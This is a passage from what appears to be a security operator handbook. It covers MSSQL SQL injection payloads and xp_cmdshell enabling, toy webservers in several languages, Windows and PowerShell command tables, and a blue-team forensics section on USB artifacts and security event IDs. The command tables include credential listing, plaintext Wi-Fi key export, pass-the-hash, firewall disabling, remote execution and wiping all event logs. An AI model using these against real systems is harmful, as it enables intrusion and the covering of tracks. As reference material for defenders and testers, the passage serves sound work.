[Link] or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--
**Each iteration reveals one new row value; add it to the "previously found row
data" list, comma separated, as in the next sample:

[Link] or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename WHERE columnName NOT IN('previously found row data', ...))--

Shell commands
EXEC master..xp_cmdshell '<command>'
**Requires sysadmin-role privileges (for example the sa login)

Enabling shell commands

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

REFERENCE:
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]

ONLINE TOOLS
UNFURL
Takes a URL and expands ("unfurls") it into a directed graph,
extracting every bit of information from the URL and exposing the
obscured.
[Link]
[Link]

WEBSERVER_Tricks
ALL INFORMATIONAL WINDOWS
Create a rudimentary webserver with various programming languages.

Create a webserver in AWK (gawk's TCP coprocess; serves a single request, then exits):

#!/usr/bin/gawk -f
BEGIN {
    RS = ORS = "\r\n"
    HttpService = "/inet/tcp/8080/0/0"
    Hello = "<HTML><HEAD>" \
            "<TITLE>A Famous Greeting</TITLE></HEAD>" \
            "<BODY><H1>Hello, world</H1></BODY></HTML>"
    Len = length(Hello) + length(ORS)
    print "HTTP/1.0 200 OK" |& HttpService
    print "Content-Length: " Len ORS |& HttpService
    print Hello |& HttpService
    # drain the request the client sent, then hang up
    while ((HttpService |& getline) > 0)
        continue;
    close(HttpService)
}

Create a webserver in Go:

package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    [Link]("/", func(w [Link], req *[Link]) {
        [Link](w, "Goodbye, World!")
    })
    [Link]([Link](":8080", nil))
}

Create a webserver in JavaScript:

Works with [Link]
var http = require('http');

[Link](function (req, res) {
    [Link](200, {'Content-Type': 'text/plain'});
    [Link]('Goodbye, World!\n');
}).listen(8080, '[Link]');

Create a webserver in Perl:

use Socket;

my $port = 8080;
my $protocol = getprotobyname( "tcp" );

# PF_INET: this socket speaks to the internet domain
# SOCK_STREAM: a TCP stream (SOCK_DGRAM would be UDP)
socket( SOCK, PF_INET, SOCK_STREAM, $protocol ) or die "couldn't open a socket: $!";

# SOL_SOCKET: set an option on the socket itself rather than on the protocol
# SO_REUSEADDR: mark the socket reusable so a quick restart does not fail on the port
setsockopt( SOCK, SOL_SOCKET, SO_REUSEADDR, 1 ) or die "couldn't set socket options: $!";

# bind our socket to $port, accepting connections on any local address
bind( SOCK, sockaddr_in($port, INADDR_ANY) ) or die "couldn't bind socket to port $port: $!";

# start listening for incoming connections
listen( SOCK, SOMAXCONN ) or die "couldn't listen to port $port: $!";

while( accept(CLIENT, SOCK) ){
    print CLIENT "HTTP/1.1 200 OK\r\n" .
        "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
        "<html><head><title>Goodbye, world!</title></head><body>Goodbye, world!</body></html>\r\n";
    close CLIENT;
}

Create a webserver using PHP:

<?php
// AF_INET6 for IPv6
$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
// bind to '[Link]' instead of 0 to limit the listener to localhost; 8080 is the port
socket_bind($socket, 0, 8080);
socket_listen($socket);

$msg = '<html><head><title>Goodbye, world!</title></head><body>Goodbye, world!</body></html>';

for (;;) {
    // @ stops PHP from spamming error messages when there is no connection
    if ($client = @socket_accept($socket)) {
        socket_write($client, "HTTP/1.1 200 OK\r\n" .
            "Content-length: " . strlen($msg) . "\r\n" .
            "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
            $msg);
        socket_close($client); // release the client socket instead of leaking one per request
    }
    else usleep(100000); // limits CPU usage by sleeping when idle
}
?>

Create a webserver using Python:

Using the wsgiref.simple_server module (Python 2.6+ and 3):
from wsgiref.simple_server import make_server

def app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/html')])
    yield b"<h1>Goodbye, World!</h1>"

server = make_server('[Link]', 8080, app)
server.serve_forever()

Using the [Link] module (Python 3.7+ for ThreadingHTTPServer; binding port 80 needs
root/administrator privileges, so use a high port when running unprivileged):

import threading
from [Link] import BaseHTTPRequestHandler, ThreadingHTTPServer

class HelloHTTPRequestHandler(BaseHTTPRequestHandler):

    message = 'Hello World! 今日は'

    def do_GET(self):
        self.send_response(200)
        self.send_header('Content-type', 'text/html; charset=UTF-8')
        self.end_headers()
        [Link]([Link]('utf-8'))
        self.close_connection = True

def serve(addr, port):
    with ThreadingHTTPServer((addr, port), HelloHTTPRequestHandler) as server:
        server.serve_forever(poll_interval=None)

if __name__ == '__main__':
    addr, port = ('localhost', 80)
    [Link](target=serve, args=(addr, port), daemon=True).start()
    try:
        while True:
            # block on stdin so Ctrl+C ends the program (the server thread is a daemon)
            input()
    except KeyboardInterrupt:
        pass

Create a webserver in UNIX shell (one request per loop iteration):

while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; echo 'Hello, World!'; } | nc -l 8080; done

The listen syntax depends on the netcat variant: OpenBSD nc takes "nc -l 8080",
while traditional/GNU netcat needs "nc -l -p 8080".

REFERENCE:
[Link]
[Link]
Service

WINDOWS_Commands
ALL ADMINISTRATION WINDOWS

COMMAND                                                                 DESCRIPTION
<COMMAND> | find /c /v ""                                               Count the number of lines sent to StdOut
arp -a                                                                  Show ARP table with MACs
cmdkey /list                                                            List cached credentials
dir /b /s <Directory>\<FileName>                                        Search directory for specific file
dism /online /disable-feature /featurename:<feature name>               Disable a particular installed feature
dism /online /Enable-Feature /FeatureName:TelnetClient                  Install the Telnet client *ADMIN
dism /online /get-features | more                                       List available features for DISM *ADMIN
for /F %i in ([file-set]) do [command]                                  Iterate over file contents and run command with %i
for /L %i in ([start],[step],[stop]) do <command>                       Counting FOR loop
ipconfig /all                                                           Show IP configuration
ipconfig /displaydns                                                    Show DNS cache
net accounts /domain                                                    Show domain password policy
net group "Domain Admins" /domain                                       Show Domain Admin users
net group "Domain Controllers" /domain                                  List Domain Controllers
net group /domain                                                       Show domain groups
net localgroup "Administrators"                                         Show local Admins
net localgroup "Administrators" user /add                               Add a user to the local Administrators group
net share                                                               Show folders currently shared by this host
net view \\<IP>                                                         Show remote host shares (net share only works locally)
net share cshare=C:\<share> /GRANT:Everyone,FULL                        Share local folder with everyone
net time \\<IP>                                                         Show time on remote host
net use \\<IP>\ipc$ "" /user:""                                         Establish NULL session with remote host
net use \\<IP>\ipc$ <PASS> /user:<USER>                                 Authenticated IPC$ session with remote host
net use r: \\<IP>\<SHARE> <PASS> /user:<DOMAIN>\<USER>                  Map remote share to local r: drive (IPC$ itself cannot be mapped to a drive letter)
net user /domain                                                        Show users in the domain
net user <USER> <PASS> /add                                             Add a user
net view /domain                                                        Show hosts in the local domain
net view /domain:<DOMAIN>                                               Show hosts in specified domain
netsh firewall set opmode disable                                       Turn off Windows Firewall (legacy syntax; Windows 7+ uses netsh advfirewall set allprofiles state off)
netsh interface ip set address local dhcp                               Configure DHCP for interface
netsh interface ip set address local static <IPaddr> <Netmask> <DefaultGW> 1    Configure LAN interface
netsh interface ip set dns local static <IPaddr>                        Configure DNS server for LAN
netsh interface ip show interfaces                                      List local interfaces
netsh wlan export profile key=clear                                     Export wireless profiles with passwords in plaintext
netsh wlan show profiles                                                Show local wireless profiles
netstat -ano <N> | find "<port>"                                        Look for port usage every N seconds
netstat -nao                                                            Show all TCP/UDP active ports and PIDs
netstat -s -p <tcp|udp|ip|icmp>                                         Show detailed protocol stats
nslookup -type=any [Link]                                               Show all available DNS records
nslookup -type=ns [Link]                                                Show DNS servers of domain
nslookup <IP>                                                           Perform reverse DNS lookup
nslookup <IP> <NAMESERVER>                                              Perform a lookup with specific DNS server
nslookup [Link]                                                         Show A record of domain
psexec /accepteula \\<IP> -c C:\Tools\[Link] -u <DOMAIN>\<USER> -p <PASS>    Copy & execute program on remote host
psexec /accepteula \\<IP> -i -s "[Link] /i [Link]" -c [Link]            Install software on remote host
psexec /accepteula \\<IP> -s c:\windows\system32\[Link] quickconfig -quiet 2>&1> $null    Enable WinRM (remote PowerShell) on remote host silently
psexec /accepteula \\<IP> -s [Link]                                     Run command as SYSTEM on remote host
psexec /accepteula \\<IP> -u <DOMAIN>\<USER> -p <LM:NTLM> [Link] /c dir c:\[Link]    Pass-the-hash run remote command (see note below)
psexec /accepteula \\<IP> -u <DOMAIN>\<USER> -p <PASS> -c -f \\<IP_2>\share\[Link]    Execute file on remote host
psexec /accepteula \\<IP> hostname                                      Get hostname of remote system
psexec /accepteula \\<IP1>,<IP2>,<IP3> hostname                         Get hostname of multiple remote systems
reg add \\<IP>\<RegDomain>\<Key>                                        Add a key to remote host's registry
reg export <RegDomain>\<Key> <[Link]>                                   Export all subkeys/values from Registry location
reg query \\<IP>\<RegDomain>\<Key> /v <ValueName>                       Query remote host for registry key value
Robocopy /ipg:750 /z /tee \\<IP>\<SHARE> \\<IP_2>\<SHARE>               Robocopy directory with bandwidth limitations
Robocopy <source> <destination> [file…] [options]                       Example robocopy syntax
Robocopy C:\UserDir C:\DirBackup /E                                     Copy all contents of local directory
route print                                                             Show routing table
runas /user:<USER> "[Link] [args]"                                      Run file as specified user
sc \\<IP> create <SERVICE>                                              Create a remote service on host
sc \\<IP> create <SERVICE> binpath= C:\Windows\System32\[Link] start= auto obj= <DOMAIN>\<USER> password= <PASS>    Install a Windows service (e.g. one written in C#) on remote host with the user/pass it should run as; sc requires the space after each "option="
sc query                                                                Query brief status of all services
sc query \\<IP>                                                         Query brief status of all services on remote host
sc query \\<IP> <ServiceName>                                           Query the status of a specific service on remote host (sc qc shows its configuration)
sc query <ServiceName>                                                  Query the status of a specific service (sc qc shows its configuration)
sc query state= all                                                     Show all services, including stopped ones
set                                                                     Show environment variables
systeminfo /S <IP> /U <DOMAIN\USER> /P <PASS>                           Pull system info for remote host at IP
taskkill /PID ## /F                                                     Force process id to stop
tasklist /m                                                             Show all processes & DLLs
tasklist /S <IP> /v                                                     Remote host process listing for IP
tasklist /svc                                                           Show all processes & services
ver                                                                     Get OS version
wmic <alias> <where> <verb>                                             Example wmic syntax

Note on pass-the-hash: the Sysinternals psexec binary only accepts a cleartext
password in -p. To run it with a hash, the hash must first be injected into the
current logon session by another tool, or use an implementation that takes hashes
directly (Impacket's psexec.py with -hashes LM:NTLM).
List all attributes
of all running
wmic /node:<IP> /user:<User> processes on remote
/password:<Pass> process list full host
wmic /node:<IP> process call create Execute file on
"\\<SMB_IP>\share\[Link]" remote system from
/user:<DOMAIN>\<USER> /password:<PASS> hosted SMB share
wmic /node:<IP> computersystem get User logged in on
username remote host
wmic logicaldisk list brief List logical disks
List Domain & Domain
Controller
wmic ntdomain list information
Execute specified
wmic process call create C:\<process> process
List all attributes
of all running
wmic process list full processes
Show all patches
wmic qfe applied
wmic startupwmic service Start wmic service
Copy remote dir to
xcopy /s \\<IP>\<dir> C:\<LocalDir> local

POWERSHELL COMMANDS
COMMAND DESCRIPTION
<PSCommand> | ConvertTo-Html | Out-File -FilePath [Link]    Convert output of command to HTML report
<PSCommand> | Export-CSV C:\[Link]                            Export output to CSV
<PSCommand> | Select-Object <Field>, <Field2> | Export-CSV C:\[Link]    Export only certain fields to CSV
Add-Content                          Adds content to the specified items, such as adding words to a file.
Backup-SqlDatabase -ServerInstance "Computer\Instance" -Database "Databasecentral"    Create a backup of SQL database
Clear-Host                           Clear the console
Compare-Object                       Compares two sets of objects.
Copy-Item                            Copies an item from one location to another.
gdr -PSProvider 'FileSystem'         List sizes of logical & mapped drives
get-childitem C:\Users -Force | select Name    Get users of the system
get-command                          Get all commands
Get-Content                          Gets the content of the item at the specified location.
get-eventlog -list                   Get local eventlog status
get-executionpolicy                  Get current execution policy
get-help -name <Command>             Get help about certain command
get-history                          Get local command history
get-localgroup | ft Name             Get groups on the system
get-localgroupmember Administrators | ft Name, PrincipalSource    Get users of admin group
get-localuser | ft Name, Enabled, LastLogon    Users' last login
Get-Process                          View all processes currently running
get-process -Id <PID1>, <PID2> | format-list *    Get certain processes' information and format output
get-service                          Show all services on local system
get-service | Where-Object {$_.Status -eq "Running"}    Show only running services on local system
get-uptime                           Get local uptime
get-winevent -ListLog *              Get all local event logs status
Group-Object                         Groups objects that contain the same value for specified properties.
Invoke-WebRequest                    Gets content from a web page on the Internet.
Measure-Object                       Calculates the numeric properties of objects, and the characters, words, and lines in string objects, such as files …
Move-Item                            Moves an item from one location to another.
New-Item                             Creates a new item.
Remove-Item                          Deletes the specified items.
Resolve-Path                         Resolves the wildcard characters in a path, and displays the path contents.
Resume-Job                           Restarts a suspended job
Set-Content                          Writes or replaces the content in an item with new content.
set-executionpolicy -ExecutionPolicy Bypass    Bypass execution policy to allow all scripts
Set-Item                             Changes the value of an item to the value specified in the command.
Set-Location                         Sets the current working location to a specified location.
Set-Variable                         Sets the value of a variable.
Show-Command                         Creates Windows PowerShell commands in a graphical command window.
Sort-Object                          Sorts objects by property values.
Start-Job                            Starts a Windows PowerShell background job.
Start-Process                        Starts one or more processes on the local computer.
Start-Service                        Starts one or more stopped services.
stop-process -name "notepad"         Stop the notepad process
Suspend-Job                          Temporarily stops workflow jobs.
Wait-Job                             Suppresses the command prompt until one or all of the Windows PowerShell background jobs running in the session are …
wevtutil el | Foreach-Object {wevtutil cl "$_"}    Delete all event log files
wevtutil el                          List names of all logs
Where-Object                         Selects objects from a collection based on their property values.
Write-Output                         Sends the specified objects to the next command in the pipeline. If the command is the last command in the pipeline, …

WINDOWS_Defend
BLUE TEAM FORENSICS WINDOWS
Evidence Collection Order of Volatility (RFC3227)
• Registers, cache
• Routing table, arp cache, process table, kernel statistics,
memory
• Temporary file systems
• Disk
• Remote logging and monitoring data that is relevant to the
system in question
• Physical configuration, network topology
• Archival media

WINDOWS BLUE/DFIR TOOLS

Microsoft Attack Surface Analyzer
[Link]
Attack Surface Analyzer is a Microsoft-developed open source
security tool that analyzes the attack surface of a target system
and reports on potential security vulnerabilities introduced during
the installation of software or system misconfiguration.

GRR Rapid Response
[Link]
GRR Rapid Response is an incident response framework focused on
remote live forensics. GRR is a Python client (agent) that is
installed on target systems, and Python server infrastructure that
can manage and talk to clients.

WINDOWS ARTIFACTS
USB ACCESS - search timeline of USB device access on the system.
Class ID / Serial #:
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
VID / PID:
HKLM\SYSTEM\CurrentControlSet\Enum\USB

Find Serial # and then look for "Friendly Name" to obtain the
Volume Name of the USB device:
HKLM\SOFTWARE\Microsoft\Windows Portable Devices\Devices

Find Serial # to obtain the Drive Letter and the Volume GUID of the
USB device:
HKLM\SYSTEM\MountedDevices

Find Serial # to obtain the Volume Serial Number of the USB device,
which will be in decimal; convert it to hex. The complete history of
Volume Serial Numbers is kept here, even if the device has been
formatted multiple times: the USB device's Serial # will appear once
per format, each with a different Volume Serial Number.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EMDMgmt
Key will ONLY be present if the system drive is NOT an SSD.

Using the Volume GUID found in SYSTEM\MountedDevices, you can find the
user that actually mounted the USB device:
[Link]\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

USB Times:
0064 = First time device connected
0066 = Last time device connected
0067 = Last removal time
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\<USB Serial #>\Properties\{93ba6346-96a6-5078-2433-b1423a575b26}\####

Search for the device's Serial # to show when the USB device was
first connected:
XP      C:\Windows\[Link]
Vista+  C:\Windows\inf\[Link]
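As an added example (not code from the Operator Handbook), the PowerShell below reads the USBSTOR, Windows Portable Devices, MountedDevices and MountPoints2 keys listed above and correlates them per device serial. It assumes an elevated session on a live system and that the MountedDevices REG_BINARY data decodes as UTF-16 device paths.

```powershell
# Added example, not from the Operator Handbook. Assumes an elevated
# session on a live system (the Enum and per-user hives need it) and
# that MountedDevices REG_BINARY values are UTF-16 device path strings.

function Get-UsbDeviceHistory {
    [CmdletBinding()]
    param()

    $usbstor = 'HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR'
    $wpd     = 'HKLM:\SOFTWARE\Microsoft\Windows Portable Devices\Devices'

    # MountedDevices: value name is "\DosDevices\E:" or "\??\Volume{GUID}",
    # data is a UTF-16 string such as "_??_USBSTOR#Disk&Ven_..#<Serial>&0#{..}".
    $mounted = foreach ($p in (Get-ItemProperty 'HKLM:\SYSTEM\MountedDevices').PSObject.Properties) {
        if ($p.Value -is [byte[]]) {
            [pscustomobject]@{
                Name = $p.Name
                Data = [System.Text.Encoding]::Unicode.GetString($p.Value)
            }
        }
    }

    # Volume names live under Windows Portable Devices; key names carry the serial.
    $wpdEntries = if (Test-Path $wpd) { Get-ChildItem $wpd } else { @() }

    # HKEY_USERS is not mapped by default; map it to reach each loaded user hive.
    if (-not (Get-PSDrive -Name HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $userHives = Get-ChildItem 'HKU:\' |
        Where-Object { $_.PSChildName -like 'S-1-5-21-*' -and $_.PSChildName -notlike '*_Classes' }

    foreach ($device in Get-ChildItem $usbstor) {
        foreach ($instance in Get-ChildItem $device.PSPath) {
            # Instance key is "<Serial>&0"; everything before the first "&" is the serial.
            $serial  = ($instance.PSChildName -split '&')[0]
            $props   = Get-ItemProperty $instance.PSPath
            $pattern = [regex]::Escape($serial)

            # Drive letter(s) and Volume GUID(s) whose device path carries this serial.
            $hits    = $mounted | Where-Object { $_.Data -match $pattern }
            $letters = @($hits | Where-Object { $_.Name -like '\DosDevices\*' } |
                         ForEach-Object { $_.Name -replace '^\\DosDevices\\', '' })
            $guids   = @($hits | Where-Object { $_.Name -like '\??\Volume{*' } |
                         ForEach-Object { $_.Name -replace '^\\\?\?\\Volume', '' })

            # Volume name from the Windows Portable Devices key that names this serial.
            $volumeName = $wpdEntries |
                Where-Object { $_.PSChildName -match $pattern } |
                ForEach-Object { (Get-ItemProperty $_.PSPath).FriendlyName } |
                Select-Object -First 1

            # A user hive listing the Volume GUID under MountPoints2 mounted the device.
            $users = foreach ($hive in $userHives) {
                foreach ($g in $guids) {
                    $mp = "HKU:\$($hive.PSChildName)\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\$g"
                    if (Test-Path $mp) { $hive.PSChildName }
                }
            }

            [pscustomobject]@{
                Device       = $device.PSChildName      # Disk&Ven_..&Prod_..&Rev_..
                Serial       = $serial
                FriendlyName = $props.FriendlyName
                VolumeName   = $volumeName
                DriveLetters = ($letters -join ',')
                VolumeGUIDs  = ($guids -join ',')
                MountedBySID = (@($users | Sort-Object -Unique) -join ',')
            }
        }
    }
}

Get-UsbDeviceHistory | Format-Table -AutoSize
```

Only hives currently loaded under HKEY_USERS are checked for MountPoints2; for offline profiles, load the NTUSER hive first.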

PREFETCH - stores/caches code pages of the last applications run into
.pf files to help apps launch quicker in the future.
Default Directory:
C:\Windows\Prefetch
Default File Structure: (exename)-(8char_hash).pf
Example File: [Link]

Registry Configuration:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters
EnablePrefetcher value:
0 = Disabled
1 = Application launch prefetching enabled
2 = Boot prefetching enabled
3 = Application launch and boot prefetching enabled

POWERSHELL HISTORY - PowerShell command history typed in a terminal.
Default File Location:
$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hi[Link]

Disable History:
STEP 1 - At the PowerShell terminal prompt type
PS> Set-PSReadlineOption -HistorySaveStyle SaveNothing
PS> $MaximumHistoryCount = 1    (minimum allowed value; limits the in-session Get-History buffer)

JUMP LISTS - time of execution of an application or recently used
files. Files are prefixed with the AppID of the application.
Default Directory:
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations
Jump List AppIDs:
[Link]pList/Resources/[Link]

EMAIL ATTACHMENTS - locally saved copies of email attachments
received when using an email client.
Outlook Default Directory:
C:\%USERPROFILE%\AppData\Local\Microsoft\Outlook
Thunderbird Default Directory:
C:\%USERPROFILE%\AppData\Roaming\Thunderbird\Profiles\

BROWSER DATA - metadata/artifacts/history for each local user
account as it relates to browser usage.

IE 8-9
C:\%USERPROFILE%\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\[Link]
IE 10-11
C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\WebCache\WebCacheV##.dat
Edge **
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxxx\AC\MicrosoftEdge\User\Default\DataStore\Data\<user>\xxxxx\DBStore\[Link]
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\#!001\MicrosoftEdge\Cache\
C:\%USERPROFILE%\AppData\Local\Packages\Microsoft.MicrosoftEdge_xxxx\AC\MicrosoftEdge\User\Default\Recovery\Active\
Firefox v3-25
C:\%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<randomtext>.default\[Link]
Firefox v26+
C:\%USERPROFILE%\AppData\Roaming\Mozilla\Firefox\Profiles\<randomtext>.default\[Link]
Table: moz_annos
Chrome
C:\%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\History

** ESE databases can be viewed with EseDbViewer, ESEDatabaseView or
the esedbexport tool.

IMAGE THUMBNAIL CACHE - images, office documents, &
directories/folders exist in thumbnail format in a database for
easy retrieval.
C:\%USERPROFILE%\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db

WINDOWS SECURITY LOG EVENTS

HUNTING EVENT_ID CATEGORIES
LOGON: 4611, 4624, 4648, 4776, 4778
LOGOFF: 4643, 4779
PRIVILEGE USAGE: 4672, 4673, 4674, 4703, 4768, 4769, 4771
PROCESS EXECUTED: 4688
PROCESS TERMINATED: 4689
FILTERING PLATFORM: 5156
ACCOUNT MGMT: 4720, 4722, 4724, 4726, 4728, 4737, 4738
POLICY CHANGE: 4670, 4904, 4905, 4946, 4947
FILE SHARING: 5140, 5142, 5144, 5145
HANDLES: 4656, 4658, 4659, 4660, 4661, 4663, 4690
VSS: 8222
SYSTEM: 7036, 7040, 7045
APPLICATION: 102, 103, 105, 216, 300, 302, 2001, 2003, 2005, 2006
LOGS CLEARED: 104
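As an added example (not part of the Operator Handbook), the category list above turned into a Get-WinEvent sweep that reports hit counts per event ID for a time window. The assignment of each category to the Security, System or Application log is my own assumption, since the page lists only the IDs; the APPLICATION category is left out because its log source is not stated.

```powershell
# Added example, not from the Operator Handbook. The category-to-log
# mapping is an assumption (104/7036/7040/7045 in System, 8222 in
# Application, the rest in Security). Reading Security requires an
# elevated session; -ComputerName queries a remote host over RPC.

$HuntCategories = @{
    'LOGON'              = @{ Log = 'Security';    Ids = 4611, 4624, 4648, 4776, 4778 }
    'LOGOFF'             = @{ Log = 'Security';    Ids = 4643, 4779 }
    'PRIVILEGE USAGE'    = @{ Log = 'Security';    Ids = 4672, 4673, 4674, 4703, 4768, 4769, 4771 }
    'PROCESS EXECUTED'   = @{ Log = 'Security';    Ids = 4688 }
    'PROCESS TERMINATED' = @{ Log = 'Security';    Ids = 4689 }
    'FILTERING PLATFORM' = @{ Log = 'Security';    Ids = 5156 }
    'ACCOUNT MGMT'       = @{ Log = 'Security';    Ids = 4720, 4722, 4724, 4726, 4728, 4737, 4738 }
    'POLICY CHANGE'      = @{ Log = 'Security';    Ids = 4670, 4904, 4905, 4946, 4947 }
    'FILE SHARING'       = @{ Log = 'Security';    Ids = 5140, 5142, 5144, 5145 }
    'HANDLES'            = @{ Log = 'Security';    Ids = 4656, 4658, 4659, 4660, 4661, 4663, 4690 }
    'VSS'                = @{ Log = 'Application'; Ids = 8222 }
    'SYSTEM'             = @{ Log = 'System';      Ids = 7036, 7040, 7045 }
    'LOGS CLEARED'       = @{ Log = 'System';      Ids = 104 }
}

function Get-HuntingEventSummary {
    param(
        [string[]]$Category = $HuntCategories.Keys,
        [int]$Hours = 24,
        [string]$ComputerName = $env:COMPUTERNAME
    )
    $since = (Get-Date).AddHours(-$Hours)

    foreach ($name in $Category) {
        $entry = $HuntCategories[$name]
        if (-not $entry) { Write-Warning "Unknown category '$name'"; continue }

        # Get-WinEvent rejects a FilterHashtable with more than roughly 22 IDs,
        # so long categories are queried in chunks of 20.
        $ids = @($entry.Ids)
        for ($i = 0; $i -lt $ids.Count; $i += 20) {
            $chunk  = $ids[$i..([Math]::Min($i + 19, $ids.Count - 1))]
            $filter = @{ LogName = $entry.Log; Id = $chunk; StartTime = $since }

            # "No events were found" is a non-terminating error; suppress it.
            $events = Get-WinEvent -FilterHashtable $filter -ComputerName $ComputerName `
                                   -ErrorAction SilentlyContinue

            foreach ($g in ($events | Group-Object -Property Id)) {
                $latest = $g.Group | Sort-Object TimeCreated -Descending | Select-Object -First 1
                [pscustomobject]@{
                    Category    = $name
                    Log         = $entry.Log
                    EventId     = $g.Name
                    Count       = $g.Count
                    LastSeen    = $latest.TimeCreated
                    LastMessage = ($latest.Message -split "`r?`n")[0]   # first line only
                }
            }
        }
    }
}

# Sweep the last 24 hours on the local host and list hits by category and ID.
Get-HuntingEventSummary -Hours 24 | Sort-Object Category, EventId | Format-Table -AutoSize
```

Narrow the sweep with -Category (for example 'PROCESS EXECUTED','ACCOUNT MGMT') and a longer -Hours window when triaging a single host; a zero count for a category that should be busy (such as LOGON) usually means the audit policy is not enabled rather than that nothing happened.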

EventID DESCRIPTION
1100 The event logging service has shut down
1101 Audit events have been dropped by the transport.
1102 The audit log was cleared
1104 The security Log is now full
1105 Event log automatic backup
1108 The event logging service encountered an error
4608 Windows is starting up
4609 Windows is shutting down
4610 An authentication package has been loaded by the Local Security Authority
4611 A trusted logon process has been registered with the Local Security Authority
4612 Internal resources allocated for the queuing of audit messages have been exhausted, leading to the loss of some audits.
4614 A notification package has been loaded by the Security Account Manager.
4615 Invalid use of LPC port
4616 The system time was changed.
4618 A monitored security event pattern has occurred
4621 Administrator recovered system from CrashOnAuditFail
4622 A security package has been loaded by the Local Security Authority.
4624 An account was successfully logged on
4625 An account failed to log on

4626 User/Device claims information
4627 Group membership information.
4634 An account was logged off
4646 IKE DoS-prevention mode started
4647 User initiated logoff
4648 A logon was attempted using explicit credentials
4649 A replay attack was detected
4650 An IPsec Main Mode security association was established
4651 An IPsec Main Mode security association was established
4652 An IPsec Main Mode negotiation failed
4653 An IPsec Main Mode negotiation failed
4654 An IPsec Quick Mode negotiation failed
4655 An IPsec Main Mode security association ended
4656 A handle to an object was requested
4657 A registry value was modified
4658 The handle to an object was closed
4659 A handle to an object was requested with intent to delete
4660 An object was deleted
4661 A handle to an object was requested
4662 An operation was performed on an object
4663 An attempt was made to access an object
4664 An attempt was made to create a hard link
4665 An attempt was made to create an application client context.
4666 An application attempted an operation
4667 An application client context was deleted
4668 An application was initialized
4670 Permissions on an object were changed
4671 An application attempted to access a blocked ordinal through the TBS
4672 Special privileges assigned to new logon
4673 A privileged service was called
4674 An operation was attempted on a privileged object
4675 SIDs were filtered
4688 A new process has been created
4689 A process has exited
4690 An attempt was made to duplicate a handle to an object
4691 Indirect access to an object was requested
4692 Backup of data protection master key was attempted
4693 Recovery of data protection master key was attempted
4694 Protection of auditable protected data was attempted
4695 Unprotection of auditable protected data was attempted
4696 A primary token was assigned to process
4697 A service was installed in the system
4698 A scheduled task was created
4699 A scheduled task was deleted
4700 A scheduled task was enabled
4701 A scheduled task was disabled
4702 A scheduled task was updated

4703 A token right was adjusted
4704 A user right was assigned
4705 A user right was removed
4706 A new trust was created to a domain
4707 A trust to a domain was removed
4709 IPsec Services was started
4710 IPsec Services was disabled
4711 PAStore Engine (1%)
4712 IPsec Services encountered a potentially serious failure
4713 Kerberos policy was changed
4714 Encrypted data recovery policy was changed
4715 The audit policy (SACL) on an object was changed
4716 Trusted domain information was modified
4717 System security access was granted to an account
4718 System security access was removed from an account
4719 System audit policy was changed
4720 A user account was created
4722 A user account was enabled
4723 An attempt was made to change an account's password
4724 An attempt was made to reset an accounts password
4725 A user account was disabled
4726 A user account was deleted
4727 A security-enabled global group was created
4728 A member was added to a security-enabled global group
4729 A member was removed from a security-enabled global group
4730 A security-enabled global group was deleted
4731 A security-enabled local group was created
4732 A member was added to a security-enabled local group
4733 A member was removed from a security-enabled local group
4734 A security-enabled local group was deleted
4735 A security-enabled local group was changed
4737 A security-enabled global group was changed
4738 A user account was changed
4739 Domain Policy was changed
4740 A user account was locked out
4741 A computer account was created
4742 A computer account was changed
4743 A computer account was deleted
4744 A security-disabled local group was created
4745 A security-disabled local group was changed
4746 A member was added to a security-disabled local group
4747 A member was removed from a security-disabled local group
4748 A security-disabled local group was deleted
4749 A security-disabled global group was created
4750 A security-disabled global group was changed
4751 A member was added to a security-disabled global group

4752 A member was removed from a security-disabled global group
4753 A security-disabled global group was deleted
4754 A security-enabled universal group was created
4755 A security-enabled universal group was changed
4756 A member was added to a security-enabled universal group
4757 A member was removed from a security-enabled universal group
4758 A security-enabled universal group was deleted
4759 A security-disabled universal group was created
4760 A security-disabled universal group was changed
4761 A member was added to a security-disabled universal group
4762 A member was removed from a security-disabled universal group
4763 A security-disabled universal group was deleted
4764 A groups type was changed
4765 SID History was added to an account
4766 An attempt to add SID History to an account failed
4767 A user account was unlocked
4768 A Kerberos authentication ticket (TGT) was requested
4769 A Kerberos service ticket was requested
4770 A Kerberos service ticket was renewed
4771 Kerberos pre-authentication failed
4772 A Kerberos authentication ticket request failed
4773 A Kerberos service ticket request failed
4774 An account was mapped for logon
4775 An account could not be mapped for logon
4776 The domain controller attempted to validate the credentials for an account
4777 The domain controller failed to validate the credentials for an account
4778 A session was reconnected to a Window Station
4779 A session was disconnected from a Window Station
4780 The ACL was set on accounts which are members of administrators groups
4781 The name of an account was changed
4782 The password hash of an account was accessed
4783 A basic application group was created
